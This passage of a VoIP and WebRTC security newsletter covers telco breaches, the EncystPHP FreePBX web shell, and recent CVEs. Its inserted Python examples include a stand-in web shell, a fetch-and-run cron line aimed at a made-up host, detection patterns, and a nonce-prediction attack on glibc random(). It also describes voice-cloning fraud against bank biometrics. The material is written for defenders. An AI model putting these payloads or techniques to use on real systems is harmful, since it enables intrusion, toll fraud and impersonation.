We’re kicking off 2026 with a packed edition. A Cisco UCM zero-day is being actively exploited, 39C3 had some excellent talks on VoLTE and satellite eavesdropping, and the FreePBX vulnerability chain we covered last year now has both a Metasploit module and a weaponized web shell in the wild.
In this edition, we cover:
- Back to breaking things in 2026: what we’re working on and what we found in 2025
- 39C3 talks of interest: South Korean telco breaches, satellite SIP/RTP leaks, and ISDN at Congress
- EncystPHP web shell exploits FreePBX: INJ3CTOR3 is back targeting PBX systems
- Element Call and Magicall: WebRTC-based privacy communication tools
- Phone phreaking, social engineering in the age of voice AI and voice biometrics
- Yealink RPS vulnerability finally gets a CVE
- Security updates round-up: Cisco UCM zero-day, Zoom MMR command injection, ALGO 8180 SIP RCE zero-days, coturn weak RNG, and more
The RTCSec newsletter is a free periodic newsletter bringing you commentary and news around VoIP and WebRTC security. We cover both defensive and offensive security as they relate to Real-time Communications.
What is RTC security anyway? Real-time communications security determines if you can safely communicate in real time - whether it be with other humans or machines.
You may sign up to receive the RTCSec newsletter here. If you like what we’re doing, you’re most welcome to:
- Forward it to those who may find this newsletter particularly fruitful.
- Let us know if there are any RTC security news items we should cover.
To view past issues, please visit our website at https://www.enablesecurity.com/newsletter/.
Our news
Back to breaking things in 2026
We’re back to pentesting full time in 2026. Right now we’re working on an engagement involving media streaming based on Wowza together with Janus for the WebRTC side, along with various API calls and many other interesting components. The vulnerabilities we’re finding are very specific to the software stack and the client, so we can’t disclose much. But this is a really interesting area where media streaming and WebRTC intersect. Protocols like HLS, RTMP and SRT are always fun to mess with, and these systems rely heavily on the security of the APIs they’re built on. This is clearly an undertested area in cybersecurity, and we’re finding a lot of good stuff. We have some experience with Janus, but it’s always fun to poke at and figure out what could go wrong. Wowza is new territory for us though, and it’s been a great learning experience so far.
In 2025 we did a number of VoIP pentests that almost all had the usual suspects: RTP Bleed, RTP Inject, DoS on signaling through SIP message flooding. Well-known issues, but clearly not well-tested. We also covered other targets beyond SIP. HTTP is found everywhere, but most APIs and webapps are surprisingly fragile and vulnerable to application-layer DoS. Hardcoded secrets are still showing up in 2025 and 2026, both in desktop applications and in JavaScript exposed on the Internet.
With that, we look forward to a year of vulnerabilities and security fixes, infused with AI and its effects on cybersecurity!
What’s happening?
39C3 talks of interest
The 39th Chaos Communication Congress (39C3), held in December 2025, featured some great talks touching on telco security, satellite eavesdropping, and legacy telephony.
Learning from South Korean Telco Breaches is a must-watch for anyone working with VoLTE and SIP. Researchers described how VoLTE implementation weaknesses at KT (Korea Telecom) led to a major operator billing breach through SMS and voice payload hijacking. Some of the findings presented:
- Researchers showed SIP traffic transmitted in clear text on certain configurations (e.g. older Xiaomi phones with Qualcomm modems had no ciphering or integrity protection for SIP)
- The talk demonstrated encryption downgrades using SIP 401/406 responses to disable IPSec
- The South Korean TTA VoLTE standard deviated from the 3GPP spec (TS 33.203), allowing connections to proceed even when security negotiation failed
- Femtocells gave attackers direct access to the S1 user plane in clear text
- The talk noted that carrier profiles, including on iOS, did not enable IPSec for IMS traffic for over a decade
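The downgrade finding is easiest to reason about in terms of the SIP security agreement (RFC 3329 Security-Client/Security-Server headers, as used by TS 33.203). The following is an added example, not code from the talk: it models what a compliant UE should do with the 401 it receives in answer to its REGISTER, and returns "abort" in exactly the cases where the deviating stacks described above went ahead anyway. The SIP messages are constructed for illustration (the SPI, port and algorithm values are made up), and an absent ealg parameter is treated here as null encryption.

```python
def parse_sip(msg):
    """Split a SIP message into (start line, {lower-case header name: [values]})."""
    head = msg.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers

def parse_mechanisms(values):
    """Parse RFC 3329 Security-Client/Security-Server values into dicts, e.g.
    'ipsec-3gpp; alg=hmac-sha-1-96; ealg=aes-cbc, tls; q=0.2' -> two mechanisms."""
    mechs = []
    for value in values:
        for item in value.split(","):
            parts = [p.strip() for p in item.split(";") if p.strip()]
            if not parts:
                continue
            mech = {"name": parts[0].lower()}
            for p in parts[1:]:
                k, _, v = p.partition("=")
                mech[k.strip().lower()] = v.strip().lower()
            mechs.append(mech)
    return mechs

def ue_decision(register, response):
    """What a UE following TS 33.203 / RFC 3329 should do with the response to its REGISTER.
    A stack that proceeds on any of the 'abort' branches can be downgraded by whoever
    controls the signalling path."""
    start, hdrs = parse_sip(response)
    code = int(start.split()[1])
    offered = {m["name"] for m in parse_mechanisms(parse_sip(register)[1].get("security-client", []))}
    if "security-server" not in hdrs:
        return "abort: %d response carries no Security-Server, refuse to register unprotected" % code
    common = [m for m in parse_mechanisms(hdrs["security-server"]) if m["name"] in offered]
    if not common:
        return "abort: no mechanism in common with our Security-Client offer"
    best = max(common, key=lambda m: float(m.get("q", "0")))
    if best["name"] != "ipsec-3gpp" or "alg" not in best:
        return "abort: selected mechanism %s provides no integrity protection" % best["name"]
    ealg = best.get("ealg", "null")   # absent ealg treated as null (no confidentiality)
    return "proceed: ipsec-3gpp integrity=%s confidentiality=%s" % (best["alg"], ealg)

# --- constructed sample messages (not captures from the talk) -----------------------
REGISTER = (
    "REGISTER sip:ims.example.net SIP/2.0\r\n"
    "Security-Client: ipsec-3gpp; alg=hmac-sha-1-96; ealg=aes-cbc; "
    "spi-c=1000; spi-s=1001; port-c=5100; port-s=5101\r\n"
    "Require: sec-agree\r\nProxy-Require: sec-agree\r\n\r\n"
)
AUTH = 'WWW-Authenticate: Digest realm="ims.example.net", nonce="abc", algorithm=AKAv1-MD5\r\n'
OK_401 = ("SIP/2.0 401 Unauthorized\r\n"
          "Security-Server: ipsec-3gpp; q=0.1; alg=hmac-sha-1-96; ealg=aes-cbc; "
          "spi-c=2000; spi-s=2001; port-c=6100; port-s=6101\r\n" + AUTH + "\r\n")
NULL_401 = ("SIP/2.0 401 Unauthorized\r\n"
            "Security-Server: ipsec-3gpp; q=0.1; alg=hmac-sha-1-96; ealg=null; "
            "spi-c=2000; spi-s=2001; port-c=6100; port-s=6101\r\n" + AUTH + "\r\n")
STRIPPED_401 = "SIP/2.0 401 Unauthorized\r\n" + AUTH + "\r\n"      # what a downgrade looks like
TLS_ONLY_401 = "SIP/2.0 401 Unauthorized\r\nSecurity-Server: tls; q=0.2\r\n" + AUTH + "\r\n"

if __name__ == "__main__":
    for label, resp in (("ok", OK_401), ("null", NULL_401), ("stripped", STRIPPED_401), ("tls", TLS_ONLY_401)):
        print(label, "->", ue_decision(REGISTER, resp))
```

The ealg=null case is the one worth flagging in a carrier review: integrity protection is present, so a downgrade is detectable, but the SIP signalling itself is still readable on the path.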
Don’t look up: There are sensitive internal links in the clear on GEO satellites (research paper: PDF) demonstrates SIP and RTP traffic broadcast in the clear over geostationary satellite links used for cellular backhaul. Providers strip LTE encryption at the tower and treat the satellite link as trusted internal infrastructure, inadvertently broadcasting raw call contents across a continental footprint. Some highlights:
- T-Mobile tower traffic in remote US regions used IPSec with a null cipher, allowing researchers to recover full phone call audio
- Telmex traffic from Mexico included unencrypted SIP call setup and voice data
- Researchers also observed unencrypted VoIP traffic directed at a city with a large US Navy base
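Whether a captured flow is clear-text SIP or RTP is a question you can answer from the UDP payloads alone, which is what the satellite and femtocell findings above come down to. The following is an added example, not the researchers' tooling: it classifies UDP payloads as SIP, RTP, RTCP or other, and for RTP uses a payload entropy heuristic to separate plain G.711 from SRTP (which keeps the same 12-byte header). The packets are constructed in the block and the 5.5 bits/byte threshold is a working assumption, not a value from the paper.

```python
import hashlib
import math
import struct

# RFC 3551 static audio payload types; dynamic types (96-127) need the SDP to interpret.
STATIC_PT = {0: "PCMU", 8: "PCMA", 9: "G722", 18: "G729"}
OTHER = {"proto": "other", "clear": None, "detail": ""}

def entropy_bits(data):
    """Shannon entropy in bits per byte. SRTP payloads sit near the maximum,
    G.711 speech and especially silence sit far below it."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def classify(payload, clear_threshold=5.5):
    """Classify one UDP payload: SIP (clear by definition if we can read it), RTP with an
    entropy-based clear-text verdict, RTCP, or other."""
    if payload.startswith(b"SIP/2.0 ") or b" SIP/2.0\r\n" in payload[:200]:
        first_line = payload.split(b"\r\n", 1)[0].decode("ascii", "replace")
        return {"proto": "sip", "clear": True, "detail": first_line}
    if len(payload) >= 12 and payload[0] >> 6 == 2:          # RFC 3550: version bits == 2
        b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", payload[:12])
        pt = b1 & 0x7F
        if 72 <= pt <= 76:  # RTCP packet types 200-204 land here once the marker bit is masked
            return {"proto": "rtcp", "clear": None, "detail": "pt=%d" % (pt | 0x80)}
        hdr_len = 12 + 4 * (b0 & 0x0F)                         # CSRC list
        if b0 & 0x10:                                         # header extension present
            if len(payload) < hdr_len + 4:
                return OTHER
            ext_words = struct.unpack("!H", payload[hdr_len + 2:hdr_len + 4])[0]
            hdr_len += 4 + 4 * ext_words
        ent = entropy_bits(payload[hdr_len:])
        detail = "pt=%d(%s) seq=%d ssrc=0x%08x entropy=%.2f" % (pt, STATIC_PT.get(pt, "dyn"), seq, ssrc, ent)
        return {"proto": "rtp", "clear": ent < clear_threshold, "detail": detail}
    return OTHER

def audit(packets):
    """packets: iterable of (src, dst, udp_payload). Returns one finding per clear-text packet."""
    findings = []
    for src, dst, payload in packets:
        v = classify(payload)
        if v["clear"]:
            findings.append("%s -> %s: clear-text %s %s" % (src, dst, v["proto"].upper(), v["detail"]))
    return findings

# --- constructed sample traffic (not from the paper) ----------------------------------
def _rtp(pt, seq, body, ssrc=0x1234ABCD):
    return struct.pack("!BBHII", 0x80, pt, seq, seq * 160, ssrc) + body

# 20 ms of PCMU "quiet speech": a handful of sample values cycling, as real G.711 does.
G711_BODY = bytes((0xFF, 0xFE, 0x7F, 0x7E, 0xFD, 0x7D) * 26 + (0xFF,) * 4)
# Stand-in for an SRTP payload: 160 bytes from a hash chain, deterministic but high-entropy.
SRTP_BODY = b"".join(hashlib.sha256(b"constructed srtp sample %d" % i).digest() for i in range(5))
SAMPLE_PACKETS = [
    ("10.0.0.5:5060", "10.0.0.9:5060",
     b"INVITE sip:+15551234567@ims.example.net SIP/2.0\r\nVia: SIP/2.0/UDP 10.0.0.5\r\n\r\n"),
    ("10.0.0.5:4000", "10.0.0.9:4000", _rtp(0, 1, G711_BODY)),
    ("10.0.1.5:4002", "10.0.1.9:4002", _rtp(0, 1, SRTP_BODY)),
    ("10.0.0.5:4001", "10.0.0.9:4001", struct.pack("!BBH", 0x81, 200, 6) + b"\x00" * 24),  # RTCP SR
    ("10.0.0.5:53", "10.0.0.9:53", b"\x12\x34\x01\x00"),                                 # not RTP
]

if __name__ == "__main__":
    for f in audit(SAMPLE_PACKETS):
        print(f)
```

Entropy is a heuristic: compressed codecs such as Opus score higher than G.711, so on a real link pair this check with the SDP from the clear SIP you just found, which tells you the codec and whether any SRTP crypto attributes were negotiated at all.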
ISDN + POTS Telephony at Congress and Camp is a fun one. While the main Congress phone infrastructure (POC) has fully migrated to VoIP, this talk covers building a vintage ISDN and POTS network for services that VoIP handles poorly: dial-up modems, ISDN data calls, fax, and older protocols like BTX and Minitel. The legacy Siemens EWSD switch connects to the VoIP world through an ISDN-to-SIP gateway called “Noodle”.
EncystPHP web shell exploits FreePBX CVE-2025-64328
FortiGuard Labs published a report on EncystPHP, a weaponized web shell that exploits CVE-2025-64328 (post-authentication command injection in FreePBX Endpoint Manager). We covered this CVE in the November 2025 newsletter. This report shows the vulnerability is now being actively exploited in the wild.
The attack is attributed to INJ3CTOR3, a threat actor group that has been targeting VoIP infrastructure for years. Check Point Research first documented them in 2020 exploiting CVE-2019-19006 on Asterisk systems. Their main goal is selling phone numbers, call plans, and live access to compromised VoIP services. They moved to exploiting Elastix systems via CVE-2021-45461 in 2021-2022. So this group is no stranger to PBX systems.
The EncystPHP webshell is quite thorough in what it does:
- Persistence: Creates a root-level user account (newfpbx), injects SSH keys, and sets up crontab entries to re-download the payload every minute.
- Competing malware removal: The dropper actively hunts and removes other webshells on the system, deleting files containing strings like “Badr”, “b3d0r”, and “pastebin”.
- Webshell deployment: Copies itself to multiple FreePBX module directories disguised as ajax.php, with timestamp forgery and .htaccess URL rewriting to avoid detection.
- PBX-aware functionality: The webshell interface (titled “Ask Master”) includes Asterisk channel queries and SIP peer listings alongside the usual file enumeration and command execution. It is designed to work in both FreePBX and Elastix environments.
- C2 infrastructure: Traffic originates from Brazil (45.234.176.202), with a C2 domain (crm.razatelefonia.pro) that appears to be a VoIP management system frontend.
The current campaign started around December 2025 and targets FreePBX Endpoint Manager versions 17.0.2.36 through 17.0.3.
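The indicators in the FortiGuard report translate directly into host checks. The following is an added example, not FortiGuard's or Sangoma's tooling: a set of small hunt functions that run over /etc/passwd, crontabs, PHP sources, .htaccess files and directory timestamps, using only the indicators listed above. It assumes the default FreePBX module path /var/www/html/admin/modules/; the sample inputs, file names and the 203.0.113.7 download host are constructed for the demo. The timestamp check relies on ctime, which touch cannot rewrite, and is a heuristic.

```python
import re
import statistics

WEBSHELL_MARKERS = ("Badr", "b3d0r", "pastebin", "Ask Master")
C2_INDICATORS = ("45.234.176.202", "crm.razatelefonia.pro")
MODULE_ROOT = "/var/www/html/admin/modules/"   # default FreePBX module path (assumption)

def check_passwd(passwd_text):
    """Flag uid-0 accounts other than root, and the newfpbx account named in the report."""
    hits = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 7 and ((f[2] == "0" and f[0] != "root") or f[0] == "newfpbx"):
            hits.append(f[0])
    return hits

def check_crontab(cron_text):
    """Flag every-minute jobs that fetch remote content, and any line naming the C2."""
    hits = []
    for line in cron_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        every_minute = s.startswith("* * * * *")
        fetches = re.search(r"\b(curl|wget)\b", s) is not None
        if (every_minute and fetches) or any(i in s for i in C2_INDICATORS):
            hits.append(s)
    return hits

def check_php_source(path, source):
    """Return the reasons a PHP file matches the EncystPHP indicators (empty list = clean)."""
    reasons = []
    if path.startswith(MODULE_ROOT) and path.endswith("/ajax.php"):
        reasons.append("ajax.php dropped inside a module directory")
    reasons += ["marker %r" % m for m in WEBSHELL_MARKERS if m in source]
    reasons += ["C2 indicator %s" % c for c in C2_INDICATORS if c in source]
    if re.search(r"\b(system|shell_exec|passthru|exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", source):
        reasons.append("shell execution of raw request input")
    return reasons

def check_htaccess(path, content):
    """URL rewriting from an .htaccess inside a module directory is the evasion the report describes."""
    if path.startswith(MODULE_ROOT) and path.endswith("/.htaccess") and \
            re.search(r"^\s*Rewrite(Engine|Rule)\b", content, re.M | re.I):
        return ["URL rewrite in module .htaccess"]
    return []

def ctime_outliers(entries, slack=3600):
    """entries: (path, ctime). mtime can be forged with touch but ctime cannot without moving
    the clock, so a file whose ctime is far later than the rest of its directory was written
    or re-created long after the module was installed. Heuristic, review hits by hand."""
    by_dir = {}
    for path, ctime in entries:
        by_dir.setdefault(path.rsplit("/", 1)[0], []).append((path, ctime))
    out = []
    for files in by_dir.values():
        med = statistics.median(c for _, c in files)
        out += [p for p, c in files if c - med > slack]
    return out

# --- constructed sample inputs ----------------------------------------------------------
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "asterisk:x:999:995::/var/lib/asterisk:/sbin/nologin\n"
                 "newfpbx:x:0:0::/root:/bin/bash\n")
SAMPLE_CRON = ("# nightly backup (legitimate)\n"
               "0 3 * * * /usr/sbin/fwconsole backup --id=1\n"
               "* * * * * curl -s http://203.0.113.7/x | sh\n")     # made-up download host
SAMPLE_SHELL = ('<?php /* constructed stand-in, not the real dropper */ $t = "Ask Master"; '
                '$c2 = "crm.razatelefonia.pro"; if (isset($_GET["c"])) { echo shell_exec($_GET["c"]); } ?>')
LEGIT_AJAX = "<?php\n// constructed stand-in for a legitimate FreePBX file\nrequire_once 'bootstrap.php';\n"
SAMPLE_STAT = [   # (path, ctime) for one module directory; file names are illustrative
    (MODULE_ROOT + "endpoint/module.xml", 1735000000),
    (MODULE_ROOT + "endpoint/functions.inc.php", 1735000010),
    (MODULE_ROOT + "endpoint/ajax.php", 1766000000),
]

if __name__ == "__main__":
    print("passwd:", check_passwd(SAMPLE_PASSWD))
    print("cron:", check_crontab(SAMPLE_CRON))
    print("php:", check_php_source(MODULE_ROOT + "endpoint/ajax.php", SAMPLE_SHELL))
    print("ctime:", ctime_outliers(SAMPLE_STAT))
```

On a live box you would feed these from `getent passwd`, every crontab under /var/spool/cron and /etc/cron.d, and `find /var/www/html/admin/modules -name ajax.php -o -name .htaccess`, then `stat -c '%n %Z'` for the ctime check. Remember the dropper also removes competing shells, so a clean marker scan does not mean the host was never touched.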
WebRTC-based privacy communication tools: Element Call and Magicall
This month we take a look at two browser-based, privacy-focused tools for voice and video communication built on WebRTC. Element Call has been in the works for a while and shipped as the default call experience in Element X back in September 2024, but a detailed architecture talk at Matrix Conference 2025 gave us a closer look at the security and privacy design. Magicall, on the other hand, is a brand new entrant from a cryptography consultancy. Both promise End-to-End Encryption (E2EE) and various privacy features. Note that we have not tested the security of these tools ourselves. This is a quick review based on what these projects claim to offer, to give you an idea of what’s happening in this space.
Element Call
Element Call is a federated real-time communication platform built on the Matrix protocol. At Enable Security we are fans of the Matrix protocol and their vision, so we’re glad to see them finally moving away from third-party conferencing systems (e.g., Jitsi in the past) to a native solution tied to the rest of the platform. They still rely on third-party software (LiveKit SFU), but this is now tightly integrated. Such changes help significantly in reducing the gap between user expectations of security and privacy versus reality.
Here is a summary of the security and privacy features that make MatrixRTC attractive:
- True end-to-end encryption (E2EE): MatrixRTC uses “Insertable Streams” (frame-level encryption) to encrypt media on the client device before it reaches the network. This ensures the server (SFU) forwards opaque packets and cannot decrypt or view the content, even while managing bandwidth.
- Sovereign multi-SFU architecture: Unlike centralized platforms, MatrixRTC allows a multi-SFU setup where participants publish media to their own homeserver’s SFU. This ensures users keep control of their media upload path and data remains within their trusted infrastructure.
- Metadata sovereignty: Users choose where their metadata resides (on their self-hosted or chosen homeserver) rather than exposing interaction data to a single centralized vendor.
- Granular access control: The system strictly enforces Matrix room permissions, distinguishing between “full-access” users (who can publish media) and “restricted” users. This prevents unauthorized participants from consuming server resources or injecting media into the call.
- “Invisible” cryptography: The framework is moving to exclude non-cross-signed devices entirely, ensuring that only verified, trusted devices can participate in encrypted calls, eliminating the risk of unverified eavesdroppers.
- Traffic obfuscation: Support for TURN-TLS allows RTC traffic over TLS on port 443, helping it blend with typical HTTPS/TLS egress and traverse restrictive firewalls.
Status: Actively developed as the next-generation conferencing solution for the Matrix ecosystem.
Magicall
Magicall is a brand new browser-based, end-to-end encrypted video calling service built by Symbolic Software, a Paris-based cryptography consultancy. It operates on a “zero friction” model, requiring no accounts for guests and no software downloads.
The key security and privacy features include:
- True end-to-end encryption (E2EE): All video, audio, and chat are encrypted directly in the browser using AES-256-GCM (SFrame) before they ever reach the network.
- Zero-knowledge architecture: Servers act as “dumb relays” that route encrypted blobs; they cannot decrypt your calls or read your messages.
- Anti-tamper verification: Features “Short Authentication Strings” (SAS) that allow you to verify participants via a 4-word code, ensuring no Man-in-the-Middle (MITM) attacks are occurring.
- Strict privacy guarantees: The service promises no AI training on your calls, no ads, and no selling of user data.
- EU jurisdiction & GDPR: Symbolic Software, a French company, built and hosts the platform in the EU, with full GDPR compliance by default.
- Cryptography background: The team has a track record in applied cryptography and has participated in public security reviews (e.g., 1Password’s cryptography review with Cure53).
- Double layer protection: Media is protected by two layers of encryption: E2E (SFrame) plus standard WebRTC transport encryption (SRTP).
Trust Model: Users must trust that the server delivers unmodified JavaScript; the scheme also relies on the integrity of the browser's WebCrypto and RTCRtpScriptTransform implementations.
Status: Alpha (as of January 2026). Supports up to 256 participants in the Pro tier.
Phone phreaking, social engineering in the age of voice AI and voice biometrics
Skyler Tuter, a security consultant from TrustedSec, gave a presentation at Wild West Hackin’ Fest in Deadwood, South Dakota. The talk, “Exploiting AI: A Case Study on Voice Biometric Penetration Testing”, covers AI-driven voice cloning against both IVR systems and human help desk agents.
The first case study details the compromise of a bank’s Interactive Voice Response (IVR) system, where 8 out of 9 test accounts were accessed by bypassing voice print verification. The second demonstrates impersonation of a corporate CIO, leading a help desk agent to reset administrator account passwords within a two-minute phone call.
I found it quite entertaining as it involves caller ID spoofing (with Zoiper), bypassing biometric matching by using AI voice cloning from ElevenLabs, no multi-attempt lockout policy and a pinch of social engineering. The presentation doesn’t go into the telephony setup details, but they likely interfaced with the target bank through SIP or used a phone provider that allowed spoofed caller IDs for PSTN. That side of the attack chain would have been interesting to hear more about.
What makes this relevant for our audience is that the VoIP and telephony layer is the enabler for these attacks. Caller ID spoofing via SIP, the ability to programmatically place calls, and the lack of authentication at the network level are what make AI voice cloning practical. As voice biometrics become more common in banking and enterprise environments, the telephony infrastructure that VoIP/UC engineers build and maintain becomes a direct part of the attack surface. If you’re running voice systems that rely on caller ID or voice biometrics for any form of trust, this talk is worth watching.
Yealink RPS vulnerability finally gets a CVE
Yealink has published a security bulletin acknowledging CVE-2025-68644 (CVSS 7.4), an unauthorized information disclosure vulnerability in their Redirect and Provisioning Service (RPS). If you’ve been following our coverage, this is the same issue that researchers Jeroen Hermans and Stefan Gloor have been disclosing since mid-2025.
We first covered this in the June 2025 newsletter when the researchers published on Full Disclosure, and again in August 2025 when they presented at the WHY 2025 hacker camp. At the time, Yealink’s own advisories downplayed the severity and lacked detail. The researchers disagreed, pointing out that the CA private key shipped with every phone allowed attackers to access provisioning data (including SIP credentials) for any Yealink device worldwide.
Now, months later, Yealink has assigned CVE-2025-68644 and published a third-party verification report by NetSPI confirming the remediation. According to the bulletin, RPS instances before 2025-06-27 were affected, and the fix was applied cloud-side through an enhanced authentication mechanism.
Timeline
- 2025-05-19: Researchers report the issue to Yealink.
- 2025-06-20/21: Public disclosure on Full Disclosure mailing list.
- 2025-06-27: Yealink claims the issue was fixed cloud-side. RPS instances before this date were affected.
- 2025-08-11/12: Research presented publicly at WHY 2025 (CCC ecosystem).
- 2025-09-19: NetSPI remediation testing date (per report).
- 2025-09-29: NetSPI report date (per report).
- 2025-11-27: Yealink publishes the Trust Center bulletin and acknowledges CVE-2025-68644.
- 2025-12-21: Earliest archive.org capture of both the bulletin page and the NetSPI PDF.
It took over six months from initial disclosure to a formal CVE acknowledgement. The timeline is worth noting for anyone dealing with Yealink vulnerability disclosures in the future.
Security Updates and Vulnerability News Round-Up
Cisco UCM zero-day RCE actively exploited (CVE-2026-20045)
An actively exploited remote code execution vulnerability (CVE-2026-20045, CVSS 8.2) affects Cisco Unified Communications Manager, UCM SME, IM & Presence Service, Unity Connection, and Webex Calling Dedicated Instance. Cisco PSIRT reports attempted exploitation in the wild and broad scanning for exposed interfaces, and CISA added it to the KEV catalog. Cisco lists 14SU5 as the first fixed release for 14.x and 15SU4 (scheduled for March 2026) as the first fixed release for 15.x; COP patch files exist for certain interim SU releases, and 12.5 must migrate to a fixed release.
Zoom MMR command injection (CVE-2026-22844)
A critical command injection vulnerability (CVE-2026-22844, CVSS 9.9) in Zoom Node Multimedia Routers (MMR) allows authenticated meeting participants to execute arbitrary code remotely. Affects Zoom Node Meetings Hybrid and Meeting Connector versions before 5.2.1716.0. This could enable compromise of multimedia routing infrastructure. Upgrade to MMR version 5.2.1716.0 or later.
ALGO 8180 IP Audio Alerter SIP RCE zero-days (CVE-2026-0792, CVE-2026-0794)
Two zero-day vulnerabilities in the ALGO 8180 IP Audio Alerter allow unauthenticated remote code execution via crafted SIP traffic. CVE-2026-0792 is a stack-based buffer overflow triggered through a crafted SIP INVITE Alert-Info header, and CVE-2026-0794 is a use-after-free in SIP call handling. Discovered by Vera Mens at Claroty Research (Team82) and published via ZDI. No patches available; ZDI recommends restricting SIP exposure and network isolation.
Mitel MiVoice MX-ONE authentication bypass (CVE-2025-67822)
A critical authentication bypass (CVE-2025-67822) in the Provisioning Manager of Mitel MiVoice MX-ONE affects versions 7.3.0.0.50 through 7.8.1.0.14. The vulnerability allows unauthorized access to admin accounts.
Metasploit module: FreePBX unauthenticated SQL injection → create admin user
Rapid7 released a Metasploit module that leverages the FreePBX “Rabbit Hole” issues to perform an unauthenticated SQL injection and create a new FreePBX administrative user (CVE-2025-66039 and CVE-2025-61675). We covered these vulnerabilities in the December 2025 edition.
coturn: Weak RNG for nonce and port randomization (CVE-2025-69217)
A cryptographic weakness (CVE-2025-69217, CVSS 7.7) affects coturn versions 4.6.2r5 through 4.7.0-r4: a 2023 commit replaced OpenSSL’s RAND_bytes with the unsafe libc random() function. An attacker observing roughly 50 sequential nonces can reconstruct the RNG state, predict future nonces and relay port allocations, and send authenticated TURN requests from spoofed IPs (if credentials are known). Reported by Mathy Vanhoef and jornlp. Upgrade to 4.8.0 or later.
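Why libc random() is unusable for nonces is worth seeing rather than taking on trust. The following is an added example, not the reporters' proof of concept or coturn code: it models glibc's default random() generator (an additive feedback generator whose outputs are the state words shifted right by one bit) and shows that after observing 31 consecutive outputs every later output is one of two candidates. The nonce layout used in the demo (two hex-encoded outputs per nonce) is a hypothetical stand-in for whatever coturn actually did with the output, and the seed is arbitrary.

```python
MASK32 = 0xFFFFFFFF
MASK31 = 0x7FFFFFFF

def glibc_random_stream(seed, count):
    """Model of glibc's default (TYPE_3) random(): 31 seed words from a Park-Miller LCG,
    then r[i] = r[i-31] + r[i-3] mod 2^32 with the first 344 values discarded; each
    output is r[i] >> 1, so callers only ever see 31-bit values."""
    seed = seed & MASK31 or 1          # seeds 1..2^31-1 modelled; glibc maps seed 0 to 1
    r = [seed]
    for _ in range(1, 31):
        r.append((16807 * r[-1]) % 2147483647)
    for i in range(31, 34):
        r.append(r[i - 31])
    out = []
    for i in range(34, 344 + count):
        r.append((r[i - 31] + r[i - 3]) & MASK32)
        if i >= 344:
            out.append(r[i] >> 1)
    return out

def predict_next(observed):
    """Given at least 31 consecutive outputs, return the (at most two) candidates for the next.
    The recurrence is linear and the only information hidden is the low bit of each state
    word, so the carry out of that bit leaves exactly two possibilities."""
    if len(observed) < 31:
        raise ValueError("need at least 31 consecutive outputs")
    s = (observed[-31] + observed[-3]) & MASK31
    return (s, (s + 1) & MASK31)

# Hypothetical nonce layout (not coturn's real one): two consecutive outputs, hex-encoded.
def nonce_from_outputs(two):
    return "%08x%08x" % (two[0], two[1])

def outputs_from_nonce(nonce):
    return [int(nonce[:8], 16), int(nonce[8:16], 16)]

def attack_demo(seed=12345, observed_nonces=20, predicted_nonces=5):
    """The server hands out nonces; the attacker recovers the output stream from the first
    `observed_nonces` of them and predicts the rest. Returns (hits, total)."""
    stream = glibc_random_stream(seed, 2 * (observed_nonces + predicted_nonces))
    nonces = [nonce_from_outputs(stream[2 * k:2 * k + 2])
              for k in range(observed_nonces + predicted_nonces)]
    seen = [v for n in nonces[:observed_nonces] for v in outputs_from_nonce(n)]
    hits = total = 0
    for n in nonces[observed_nonces:]:
        for actual in outputs_from_nonce(n):
            total += 1
            if actual in predict_next(seen):
                hits += 1
            seen.append(actual)        # each nonce the server issues refines the attacker's view
    return hits, total

if __name__ == "__main__":
    hits, total = attack_demo()
    print("predicted %d of %d future nonce words (2 candidates each)" % (hits, total))
```

Two candidates per 31-bit word means a nonce is effectively guessable with a couple of tries, which is all an attacker needs when the nonce is the only thing binding a TURN request to a session. Relay port allocation drawn from the same generator falls the same way. Anything of this kind should come from the OS CSPRNG or RAND_bytes, as the 4.8.0 fix restores.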
Windows Telephony Service elevation of privilege (CVE-2026-20931)
A high-severity elevation of privilege vulnerability (CVE-2026-20931, CVSS 8.0) in Windows Telephony Service (TAPISRV) allows an authorized attacker to elevate privileges over an adjacent network by exploiting external control of file name or path. Patched in the January 2026 Patch Tuesday.
Pexip Infinity v39 WebRTC DoS fixes
Pexip Infinity v39 fixes multiple WebRTC-related denial of service issues. A crafted media stream can trigger a controlled abort in media processing (CVE-2025-66379), crafted signalling can cause a temporary DoS when “Direct Media for WebRTC” is enabled (CVE-2025-66443), and insufficient access control in RTMP allows attackers to disconnect streams traversing a Proxy Node (CVE-2025-66378). Upgrade to v39.
µURU dialplan injection via federation name (CVE-2025-69205)
A dialplan injection vulnerability (CVE-2025-69205, CVSS 6.3) in the Asterisk federation feature of µURU allows injection of special characters into the Dial() application through improper input validation on federation names. This enables unauthorized call redirection and potential toll fraud. Reported by Moritz Wörmann and patched in a commit.
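The mechanics of a Dial() injection are simple once you remember that variable substitution happens before the application parses its arguments, so separators inside a substituted value become structure. The following is an added example, not µURU's code or its fix: it models a dialplan line of the form Dial(PJSIP/${EXTEN}@${FED},30,T), shows what an attacker-controlled federation name does to the parsed targets and timeout, and gives the allow-list check that should sit in front of it. The dialplan line, the PJSIP technology and the sample names are assumptions for the illustration.

```python
import re

# Conservative allow-list for a federation name used as the host part of a dial string:
# DNS-label characters only, so neither Dial()'s separators (',' and '&') nor SIP URI
# delimiters can get in.
FEDERATION_NAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,253})$")
EXTEN_RE = re.compile(r"^\+?[0-9]{1,20}$")

def is_safe_federation_name(name):
    return bool(FEDERATION_NAME_RE.match(name))

def build_dial_arg(exten, federation_name):
    """Mimics  exten => _X.,1,Dial(PJSIP/${EXTEN}@${FED},30,T)  after substitution:
    the name is pasted into the argument string before Dial() parses anything."""
    return "PJSIP/%s@%s,30,T" % (exten, federation_name)

def parse_dial_args(arg):
    """Minimal model of Dial()'s argument parsing: ',' separates dialstring, timeout and
    options; '&' splits the dialstring into parallel targets."""
    parts = arg.split(",")
    return {
        "targets": parts[0].split("&"),
        "timeout": parts[1] if len(parts) > 1 else "",
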